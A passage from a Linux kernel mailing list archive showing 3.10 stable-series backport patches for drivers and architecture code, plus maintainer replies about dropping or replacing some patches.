  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (213 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 314/319] mfd: 88pm80x: Double shifting bug in suspend/resume Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 316/319] regulator: tps65910: Work around silicon erratum SWCZ010 Willy Tarreau
                   ` (3 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Peter Ujfalusi, Mark Brown, Willy Tarreau

From: Peter Ujfalusi <peter.ujfalusi@ti.com>

commit a8719670687c46ed2e904c0d05fa4cd7e4950cd1 upstream.

Fixes: ddd17531ad908 ("ASoC: omap-mcpdm: Clean up with devm_* function")

Managed irq request will not doing any good in ASoC probe level as it is
not going to free up the irq when the driver is unbound from the sound
card.

Signed-off-by: Peter Ujfalusi <peter.ujfalusi@ti.com>
Reported-by: Russell King <linux@armlinux.org.uk>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/soc/omap/omap-mcpdm.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/sound/soc/omap/omap-mcpdm.c b/sound/soc/omap/omap-mcpdm.c
index eb05c7e..5dc6b23 100644
--- a/sound/soc/omap/omap-mcpdm.c
+++ b/sound/soc/omap/omap-mcpdm.c
@@ -393,8 +393,8 @@ static int omap_mcpdm_probe(struct snd_soc_dai *dai)
 	pm_runtime_get_sync(mcpdm->dev);
 	omap_mcpdm_write(mcpdm, MCPDM_REG_CTRL, 0x00);
 
-	ret = devm_request_irq(mcpdm->dev, mcpdm->irq, omap_mcpdm_irq_handler,
-				0, "McPDM", (void *)mcpdm);
+	ret = request_irq(mcpdm->irq, omap_mcpdm_irq_handler, 0, "McPDM",
+			  (void *)mcpdm);
 
 	pm_runtime_put_sync(mcpdm->dev);
 
@@ -414,6 +414,7 @@ static int omap_mcpdm_remove(struct snd_soc_dai *dai)
 {
 	struct omap_mcpdm *mcpdm = snd_soc_dai_get_drvdata(dai);
 
+	free_irq(mcpdm->irq, (void *)mcpdm);
 	pm_runtime_disable(mcpdm->dev);
 
 	return 0;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 316/319] regulator: tps65910: Work around silicon erratum SWCZ010
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (214 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 315/319] ASoC: omap-mcpdm: Fix irq resource handling Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 317/319] dm: mark request_queue dead before destroying the DM device Willy Tarreau
                   ` (2 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jan Remmet, Mark Brown, Willy Tarreau

From: Jan Remmet <j.remmet@phytec.de>

commit 8f9165c981fed187bb483de84caf9adf835aefda upstream.

http://www.ti.com/lit/pdf/SWCZ010:
  DCDC o/p voltage can go higher than programmed value

Impact:
VDDI, VDD2, and VIO output programmed voltage level can go higher than
expected or crash, when coming out of PFM to PWM mode or using DVFS.

Description:
When DCDC CLK SYNC bits are 11/01:
* VIO 3-MHz oscillator is the source clock of the digital core and input
  clock of VDD1 and VDD2
* Turn-on of VDD1 and VDD2 HSD PFETis synchronized or at a constant
  phase shift
* Current pulled though VCC1+VCC2 is Iload(VDD1) + Iload(VDD2)
* The 3 HSD PFET will be turned-on at the same time, causing the highest
  possible switching noise on the application. This noise level depends
  on the layout, the VBAT level, and the load current. The noise level
  increases with improper layout.

When DCDC CLK SYNC bits are 00:
* VIO 3-MHz oscillator is the source clock of digital core
* VDD1 and VDD2 are running on their own 3-MHz oscillator
* Current pulled though VCC1+VCC2 average of Iload(VDD1) + Iload(VDD2)
* The switching noise of the 3 SMPS will be randomly spread over time,
  causing lower overall switching noise.

Workaround:
Set DCDCCTRL_REG[1:0]= 00.

Signed-off-by: Jan Remmet <j.remmet@phytec.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/regulator/tps65910-regulator.c | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/drivers/regulator/tps65910-regulator.c b/drivers/regulator/tps65910-regulator.c
index 45c1644..1ed4145 100644
--- a/drivers/regulator/tps65910-regulator.c
+++ b/drivers/regulator/tps65910-regulator.c
@@ -1080,6 +1080,12 @@ static int tps65910_probe(struct platform_device *pdev)
 		pmic->num_regulators = ARRAY_SIZE(tps65910_regs);
 		pmic->ext_sleep_control = tps65910_ext_sleep_control;
 		info = tps65910_regs;
+		/* Work around silicon erratum SWCZ010: output programmed
+		 * voltage level can go higher than expected or crash
+		 * Workaround: use no synchronization of DCDC clocks
+		 */
+		tps65910_reg_clear_bits(pmic->mfd, TPS65910_DCDCCTRL,
+					DCDCCTRL_DCDCCKSYNC_MASK);
 		break;
 	case TPS65911:
 		pmic->get_ctrl_reg = &tps65911_get_ctrl_register;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 317/319] dm: mark request_queue dead before destroying the DM device
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (215 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 316/319] regulator: tps65910: Work around silicon erratum SWCZ010 Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 318/319] fbdev/efifb: Fix 16 color palette entry calculation Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 319/319] metag: Only define atomic_dec_if_positive conditionally Willy Tarreau
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Bart Van Assche, Mike Snitzer, Jiri Slaby, Willy Tarreau

From: Bart Van Assche <bart.vanassche@sandisk.com>

commit 3b785fbcf81c3533772c52b717f77293099498d3 upstream.

This avoids that new requests are queued while __dm_destroy() is in
progress.

[js] use md->queue instead of non-present helper

Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/md/dm.c | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/drivers/md/dm.c b/drivers/md/dm.c
index f69fed8..a77ef6c 100644
--- a/drivers/md/dm.c
+++ b/drivers/md/dm.c
@@ -2323,6 +2323,7 @@ EXPORT_SYMBOL_GPL(dm_device_name);
 
 static void __dm_destroy(struct mapped_device *md, bool wait)
 {
+	struct request_queue *q = md->queue;
 	struct dm_table *map;
 
 	might_sleep();
@@ -2333,6 +2334,10 @@ static void __dm_destroy(struct mapped_device *md, bool wait)
 	set_bit(DMF_FREEING, &md->flags);
 	spin_unlock(&_minor_lock);
 
+	spin_lock_irq(q->queue_lock);
+	queue_flag_set(QUEUE_FLAG_DYING, q);
+	spin_unlock_irq(q->queue_lock);
+
 	/*
 	 * Take suspend_lock so that presuspend and postsuspend methods
 	 * do not race with internal suspend.
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 318/319] fbdev/efifb: Fix 16 color palette entry calculation
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (216 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 317/319] dm: mark request_queue dead before destroying the DM device Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 319/319] metag: Only define atomic_dec_if_positive conditionally Willy Tarreau
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Max Staudt, Tomi Valkeinen, Willy Tarreau

From: Max Staudt <mstaudt@suse.de>

commit d50b3f43db739f03fcf8c0a00664b3d2fed0496e upstream.

When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered
in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green
(#50bc50) and neighboring pixels have slightly different values
(such as #50bc78).

The reason is that fbcon loads its 16 color palette through
efifb_setcolreg(), which in turn calculates a 32-bit value to write
into memory for each palette index.
Until now, this code could only handle 8-bit visuals and didn't mask
overlapping values when ORing them.

With this patch, fbcon displays the correct colors when a qemu VM is
booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16").

Fixes: 7c83172b98e5 ("x86_64 EFI boot support: EFI frame buffer driver")  # v2.6.24+
Signed-off-by: Max Staudt <mstaudt@suse.de>
Acked-By: Peter Jones <pjones@redhat.com>
Signed-off-by: Tomi Valkeinen <tomi.valkeinen@ti.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/video/efifb.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/drivers/video/efifb.c b/drivers/video/efifb.c
index 50fe668..08dbe8a 100644
--- a/drivers/video/efifb.c
+++ b/drivers/video/efifb.c
@@ -270,9 +270,9 @@ static int efifb_setcolreg(unsigned regno, unsigned red, unsigned green,
 		return 1;
 
 	if (regno < 16) {
-		red   >>= 8;
-		green >>= 8;
-		blue  >>= 8;
+		red   >>= 16 - info->var.red.length;
+		green >>= 16 - info->var.green.length;
+		blue  >>= 16 - info->var.blue.length;
 		((u32 *)(info->pseudo_palette))[regno] =
 			(red   << info->var.red.offset)   |
 			(green << info->var.green.offset) |
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 319/319] metag: Only define atomic_dec_if_positive conditionally
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (217 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 318/319] fbdev/efifb: Fix 16 color palette entry calculation Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: James Hogan, Willy Tarreau

From: Guenter Roeck <linux@roeck-us.net>

commit 35d04077ad96ed33ceea2501f5a4f1eacda77218 upstream.

The definition of atomic_dec_if_positive() assumes that
atomic_sub_if_positive() exists, which is only the case if
metag specific atomics are used. This results in the following
build error when trying to build metag1_defconfig.

kernel/ucount.c: In function 'dec_ucount':
kernel/ucount.c:211: error:
	implicit declaration of function 'atomic_sub_if_positive'

Moving the definition of atomic_dec_if_positive() into the metag
conditional code fixes the problem.

Fixes: 6006c0d8ce94 ("metag: Atomics, locks and bitops")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/metag/include/asm/atomic.h | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/arch/metag/include/asm/atomic.h b/arch/metag/include/asm/atomic.h
index 307ecd2..d7d6b9e 100644
--- a/arch/metag/include/asm/atomic.h
+++ b/arch/metag/include/asm/atomic.h
@@ -38,6 +38,7 @@
 #define atomic_dec(v) atomic_sub(1, (v))
 
 #define atomic_inc_not_zero(v) atomic_add_unless((v), 1, 0)
+#define atomic_dec_if_positive(v)       atomic_sub_if_positive(1, v)
 
 #define smp_mb__before_atomic_dec()	barrier()
 #define smp_mb__after_atomic_dec()	barrier()
@@ -46,8 +47,6 @@
 
 #endif
 
-#define atomic_dec_if_positive(v)       atomic_sub_if_positive(1, v)
-
 #include <asm-generic/atomic64.h>
 
 #endif /* __ASM_METAG_ATOMIC_H */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 275/319] ipc: remove use of seq_printf return value
  2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
@ 2017-02-05 19:49   ` Joe Perches
  2017-02-05 20:35     ` Willy Tarreau
  2017-02-06  8:06   ` Willy Tarreau
  1 sibling, 1 reply; 239+ messages in thread
From: Joe Perches @ 2017-02-05 19:49 UTC (permalink / raw)
  To: Willy Tarreau, linux-kernel, stable, linux; +Cc: Andrew Morton, Linus Torvalds

On Sun, 2017-02-05 at 20:21 +0100, Willy Tarreau wrote:
> From: Joe Perches <joe@perches.com>
> 
> commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.
> 
> The seq_printf return value, because it's frequently misused,
> will eventually be converted to void.

Is this necessary?  It doesn't seem so.

This one seems an unlikely candidate to backport as
it effectively doesn't do anything but prepare for
seq_printf return value removal.

Is that removal going to be backported too or is this
being patched to avoid some other backported patch's
desire to be applied without offsets?

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 275/319] ipc: remove use of seq_printf return value
  2017-02-05 19:49   ` Joe Perches
@ 2017-02-05 20:35     ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 20:35 UTC (permalink / raw)
  To: Joe Perches; +Cc: linux-kernel, stable, linux, Andrew Morton, Linus Torvalds

Hi Joe,

On Sun, Feb 05, 2017 at 11:49:33AM -0800, Joe Perches wrote:
> On Sun, 2017-02-05 at 20:21 +0100, Willy Tarreau wrote:
> > From: Joe Perches <joe@perches.com>
> > 
> > commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.
> > 
> > The seq_printf return value, because it's frequently misused,
> > will eventually be converted to void.
> 
> Is this necessary?  It doesn't seem so.
> 
> This one seems an unlikely candidate to backport as
> it effectively doesn't do anything but prepare for
> seq_printf return value removal.
> 
> Is that removal going to be backported too or is this
> being patched to avoid some other backported patch's
> desire to be applied without offsets?

Hmmm sorry, I missed the comment on this one, it was picked
because it makes it easier to apply "ipc/sem.c: fix
complex_count vs. simple op race". This latter was picked
as-is from Jiri's 3.12 tree so I preferred to avoid modifying
it. I'll just mention it in the commit message.

Thanks for notifying me.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt()
  2017-02-05 19:20 ` [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt() Willy Tarreau
@ 2017-02-06  5:14   ` Bart Van Assche
  2017-02-06  6:32     ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: Bart Van Assche @ 2017-02-06  5:14 UTC (permalink / raw)
  To: linux, linux-kernel, w, stable; +Cc: sagig, dledford, nab

On Sun, 2017-02-05 at 20:20 +0100, Willy Tarreau wrote:
> From: Bart Van Assche <bart.vanassche@sandisk.com>
> 
> commit 51093254bf879bc9ce96590400a87897c7498463 upstream.
> 
> Let the target core check task existence instead of the SRP target
> driver. Additionally, let the target core check the validity of the
> task management request instead of the ib_srpt driver.
> 
> This patch fixes the following kernel crash:
> 
> BUG: unable to handle kernel NULL pointer dereference at 0000000000000001
> IP: [<ffffffffa0565f37>] srpt_handle_new_iu+0x6d7/0x790 [ib_srpt]
> Oops: 0002 [#1] SMP
> Call Trace:
>  [<ffffffffa05660ce>] srpt_process_completion+0xde/0x570 [ib_srpt]
>  [<ffffffffa056669f>] srpt_compl_thread+0x13f/0x160 [ib_srpt]
>  [<ffffffff8109726f>] kthread+0xcf/0xe0
>  [<ffffffff81613cfc>] ret_from_fork+0x7c/0xb0

Hi Willy,

The first part of the description of this patch is correct (the part about
the refactoring) but the second part not (about the kernel crash). If you
are looking only for patches that fix bugs you may want to skip this patch.

Bart.

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt()
  2017-02-06  5:14   ` Bart Van Assche
@ 2017-02-06  6:32     ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  6:32 UTC (permalink / raw)
  To: Bart Van Assche; +Cc: linux, linux-kernel, stable, sagig, dledford, nab

Hi Bart,

On Mon, Feb 06, 2017 at 05:14:04AM +0000, Bart Van Assche wrote:
> On Sun, 2017-02-05 at 20:20 +0100, Willy Tarreau wrote:
> > From: Bart Van Assche <bart.vanassche@sandisk.com>
> > 
> > commit 51093254bf879bc9ce96590400a87897c7498463 upstream.
> > 
> > Let the target core check task existence instead of the SRP target
> > driver. Additionally, let the target core check the validity of the
> > task management request instead of the ib_srpt driver.
> > 
> > This patch fixes the following kernel crash:
> > 
> > BUG: unable to handle kernel NULL pointer dereference at 0000000000000001
> > IP: [<ffffffffa0565f37>] srpt_handle_new_iu+0x6d7/0x790 [ib_srpt]
> > Oops: 0002 [#1] SMP
> > Call Trace:
> >  [<ffffffffa05660ce>] srpt_process_completion+0xde/0x570 [ib_srpt]
> >  [<ffffffffa056669f>] srpt_compl_thread+0x13f/0x160 [ib_srpt]
> >  [<ffffffff8109726f>] kthread+0xcf/0xe0
> >  [<ffffffff81613cfc>] ret_from_fork+0x7c/0xb0
> 
> Hi Willy,
> 
> The first part of the description of this patch is correct (the part about
> the refactoring) but the second part not (about the kernel crash). If you
> are looking only for patches that fix bugs you may want to skip this patch.

OK I'm dropping it then.

Thanks!
Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race
  2017-02-05 19:21 ` [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race Willy Tarreau
@ 2017-02-06  8:04   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:04 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Manfred Spraul, H. Peter Anvin, Peter Zijlstra, Davidlohr Bueso,
	Thomas Gleixner, Ingo Molnar, 1vier1, Andrew Morton,
	Linus Torvalds, Jiri Slaby

On Sun, Feb 05, 2017 at 08:21:44PM +0100, Willy Tarreau wrote:
> From: Manfred Spraul <manfred@colorfullife.com>
> 
> commit 5864a2fd3088db73d47942370d0f7210a807b9bc upstream.
> 
> Commit 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()") introduced a
> race:

Finally dropped in favor of a revert of the patch above as it broke
the build on some architectures.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release()
  2017-02-05 19:21 ` [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release() Willy Tarreau
@ 2017-02-06  8:05   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:05 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Paul E. McKenney, Peter Zijlstra

On Sun, Feb 05, 2017 at 08:21:43PM +0100, Willy Tarreau wrote:
> From: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
> 
> commit 536fa402221f09633e7c5801b327055ab716a363 upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE
  2017-02-05 19:21 ` [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE Willy Tarreau
@ 2017-02-06  8:05   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:05 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Davidlohr Bueso, H . Peter Anvin, Paul McKenney,
	Stephen Rothwell, Thomas Gleixner, Ingo Molnar

On Sun, Feb 05, 2017 at 08:21:42PM +0100, Willy Tarreau wrote:
> From: Peter Zijlstra <peterz@infradead.org>
> 
> commit 7bd3e239d6c6d1cad276e8f130b386df4234dcd7 upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments
  2017-02-05 19:21 ` [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments Willy Tarreau
@ 2017-02-06  8:05   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:05 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Linus Torvalds, Christian Borntraeger

On Sun, Feb 05, 2017 at 08:21:41PM +0100, Willy Tarreau wrote:
> From: Linus Torvalds <torvalds@linux-foundation.org>
> 
> commit dd36929720f40f17685e841ae0d4c581c165ea60 upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val)
  2017-02-05 19:21 ` [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val) Willy Tarreau
@ 2017-02-06  8:06   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:06 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Christian Borntraeger

On Sun, Feb 05, 2017 at 08:21:40PM +0100, Willy Tarreau wrote:
> From: Christian Borntraeger <borntraeger@de.ibm.com>
> 
> commit 43239cbe79fc369f5d2160bd7f69e28b5c50a58c upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE
  2017-02-05 19:21 ` [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE Willy Tarreau
@ 2017-02-06  8:06   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:06 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Christian Borntraeger

On Sun, Feb 05, 2017 at 08:21:39PM +0100, Willy Tarreau wrote:
> From: Christian Borntraeger <borntraeger@de.ibm.com>
> 
> commit 230fa253df6352af12ad0a16128760b5cb3f92df upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release()
  2017-02-05 19:21 ` [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release() Willy Tarreau
@ 2017-02-06  8:06   ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:06 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Benjamin Herrenschmidt, Frederic Weisbecker,
	Mathieu Desnoyers, Michael Ellerman, Michael Neuling,
	Russell King, Geert Uytterhoeven, Heiko Carstens, Linus Torvalds,
	Martin Schwidefsky, Victor Kaplansky, Tony Luck, Oleg Nesterov,
	Ingo Molnar

On Sun, Feb 05, 2017 at 08:21:38PM +0100, Willy Tarreau wrote:
> From: Peter Zijlstra <peterz@infradead.org>
> 
> commit 47933ad41a86a4a9b50bed7c9b9bd2ba242aac63 upstream

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 275/319] ipc: remove use of seq_printf return value
  2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
  2017-02-05 19:49   ` Joe Perches
@ 2017-02-06  8:06   ` Willy Tarreau
  1 sibling, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06  8:06 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Joe Perches, Andrew Morton, Linus Torvalds

On Sun, Feb 05, 2017 at 08:21:37PM +0100, Willy Tarreau wrote:
> From: Joe Perches <joe@perches.com>
> 
> commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.

Dropped as not needed anymore by the ipc/sem fix.

Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* RE: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-05 19:19 ` [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination Willy Tarreau
@ 2017-02-06 16:21   ` Sathya Prakash Veerichetty
  2017-02-06 22:26     ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: Sathya Prakash Veerichetty @ 2017-02-06 16:21 UTC (permalink / raw)
  To: Willy Tarreau, linux-kernel, stable, linux
  Cc: Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

Willy,
I think this patch had a problem and later modified to a different
blocking mechanism.  Could you please pull in the latest change for this?

Thanks
Sathya

-----Original Message-----
From: Willy Tarreau [mailto:w@1wt.eu]
Sent: Sunday, February 05, 2017 12:19 PM
To: linux-kernel@vger.kernel.org; stable@vger.kernel.org;
linux@roeck-us.net
Cc: Andrey Grodzovsky; linux-scsi@vger.kernel.org; Sathya Prakash; Chaitra
P B; Suganath Prabu Subramani; Sreekanth Reddy; Hannes Reinecke; Martin K
. Petersen; Willy Tarreau
Subject: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature
termination

From: Andrey Grodzovsky <andrey2805@gmail.com>

commit 18f6084a989ba1b38702f9af37a2e4049a924be6 upstream.

This is a work around for a bug with LSI Fusion MPT SAS2 when perfoming
secure erase. Due to the very long time the operation takes, commands
issued during the erase will time out and will trigger execution of the
abort hook. Even though the abort hook is called for the specific command
which timed out, this leads to entire device halt (scsi_state terminated)
and premature termination of the secure erase.

Set device state to busy while ATA passthrough commands are in progress.

[mkp: hand applied to 4.9/scsi-fixes, tweaked patch description]

Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: <linux-scsi@vger.kernel.org>
Cc: Sathya Prakash <sathya.prakash@broadcom.com>
Cc: Chaitra P B <chaitra.basappa@broadcom.com>
Cc: Suganath Prabu Subramani <suganath-prabu.subramani@broadcom.com>
Cc: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: Hannes Reinecke <hare@suse.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt3sas/mpt3sas_scsih.c | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index f8c4b85..e414b71 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3515,6 +3515,10 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd,
u16 ioc_status)
 	    SAM_STAT_CHECK_CONDITION;
 }

+static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd) {
+	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16); }

 /**
  * _scsih_qcmd_lck - main scsi request entry point @@ -3543,6 +3547,13 @@
_scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		scsi_print_command(scmd);
 #endif

+	/*
+	 * Lock the device for any subsequent command until command is
+	 * done.
+	 */
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_block(scmd->device);
+
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -4046,6 +4057,9 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16
smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;

+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+
 	mpi_request = mpt3sas_base_get_msg_frame(ioc, smid);

 	if (mpi_reply == NULL) {
--
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-06 16:21   ` Sathya Prakash Veerichetty
@ 2017-02-06 22:26     ` Willy Tarreau
  2017-02-07  6:38       ` James Bottomley
  0 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-06 22:26 UTC (permalink / raw)
  To: Sathya Prakash Veerichetty
  Cc: linux-kernel, stable, linux, Andrey Grodzovsky, linux-scsi,
	Chaitra Basappa, Suganath Prabu Subramani, Sreekanth Reddy,
	Hannes Reinecke, Martin K . Petersen

Hi Sathya,

On Mon, Feb 06, 2017 at 09:21:44AM -0700, Sathya Prakash Veerichetty wrote:
> Willy,
> I think this patch had a problem and later modified to a different
> blocking mechanism.  Could you please pull in the latest change for this?

Much appreciated, thanks. I've checked and found the patch you're
talking about :

